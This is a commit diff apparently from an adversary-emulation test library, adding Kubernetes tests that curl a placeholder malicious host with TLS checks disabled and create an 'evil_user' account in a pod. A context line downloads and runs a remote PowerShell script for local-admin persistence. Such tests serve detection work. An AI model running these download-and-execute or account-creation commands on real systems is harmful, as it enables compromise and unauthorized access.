Merge branch 'master' into insecure-curl

2025-10-06 11:46:05 -04:00 · 2025-10-04 13:53:12 -04:00 · 2025-10-04 13:51:51 -04:00 · 2025-10-04 13:51:35 -04:00 · 2025-10-04 13:50:35 -04:00 · 2025-10-02 13:55:07 -07:00
2 changed files with 61 additions and 1 deletions
@@ -1268,4 +1268,34 @@ atomic_tests:
      Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json" -Force -ErrorAction Ignore
    name: powershell
-    elevation_required: false
+    elevation_required: false
 - name: Curl Insecure Connection from a Pod
  description: |
    Launches an Ubuntu pod, installs curl, and executes curl with insecure flags (-k/--insecure)
    against a target URL. The pod is automatically deleted after execution.
  supported_platforms:
  - containers
  input_arguments:
    pod_name:
      description: K8s pod_name to execute the command in
      type: string
      default: atomic-insecure-curl
    remote_url:
      description: Remote URL to curl
      type: string
      default: https://malicious-apt.com
    image_name:
      description: Name of the docker image
      type: string
      default: curlimages/curl
  dependencies:
  - description: kubectl must be installed and configured
    get_prereq_command: |
      echo "kubectl must be installed manually"
    prereq_command: |
      which kubectl
  executor:
    name: bash
    elevation_required: false
    command: |
      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- curl -ksL #{remote_url}
@@ -185,3 +185,33 @@ atomic_tests:
    command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
    name: powershell
    elevation_required: true
 - name: Create a Linux user via kubectl in a Pod
  description: |
    Launches a short-lived Alpine pod and creates a Linux user inside the pod.
    The pod is automatically deleted after execution.
  supported_platforms:
  - containers
  input_arguments:
    pod_name:
      description: K8s pod_name to execute the command in
      type: string
      default: atomic-linux-useradd
    username:
      description: Username of the user to create inside the pod
      type: string
      default: evil_user
    image_name:
      description: Name of the docker image
      type: string
      default: alpine
  dependencies:
  - description: kubectl must be installed and configured
    get_prereq_command: |
      echo "kubectl must be installed manually"
    prereq_command: |
      which kubectl
  executor:
    name: bash
    elevation_required: false
    command: |
      kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
Author	SHA1	Message	Date
Hare Sudhan	38dff4b4c9	Merge branch 'master' into insecure-curl	2025-10-06 11:46:05 -04:00
Hare Sudhan	1762ecd901	Merge branch 'master' into insecure-curl	2025-10-04 13:53:12 -04:00
Hare Sudhan	7ce2fa4f98	Merge branch 'master' into insecure-curl	2025-10-04 13:51:51 -04:00
Hare Sudhan	658f08f0a8	fix	2025-10-04 13:51:35 -04:00
Hare Sudhan	0352cebfd7	adding input args	2025-10-04 13:50:35 -04:00
Bhavin Patel	1e11637f36	Merge branch 'master' into insecure-curl	2025-10-02 13:55:07 -07:00
Bhavin Patel	c50a0cba09	Merge branch 'master' into insecure-curl	2025-10-02 09:44:29 -07:00
Bhavin Patel	73bff9fa08	Merge branch 'master' into insecure-curl	2025-10-01 11:36:04 -07:00
Bhavin Patel	b106ba8166	Merge branch 'master' into insecure-curl	2025-09-29 16:27:53 -07:00
Bhavin Patel	2b35fb1355	new atomic	2025-09-29 15:46:20 -07:00
Bhavin Patel	5a351ceca1	remove wrong ID	2025-09-26 10:32:42 -07:00
Bhavin Patel	41af6076cc	updating	2025-09-19 16:40:37 -07:00
Bhavin Patel	6bbad36637	updating atomic number	2025-09-19 16:37:41 -07:00
Bhavin Patel	0005199d49	adding a kubectl atomic	2025-09-19 16:28:48 -07:00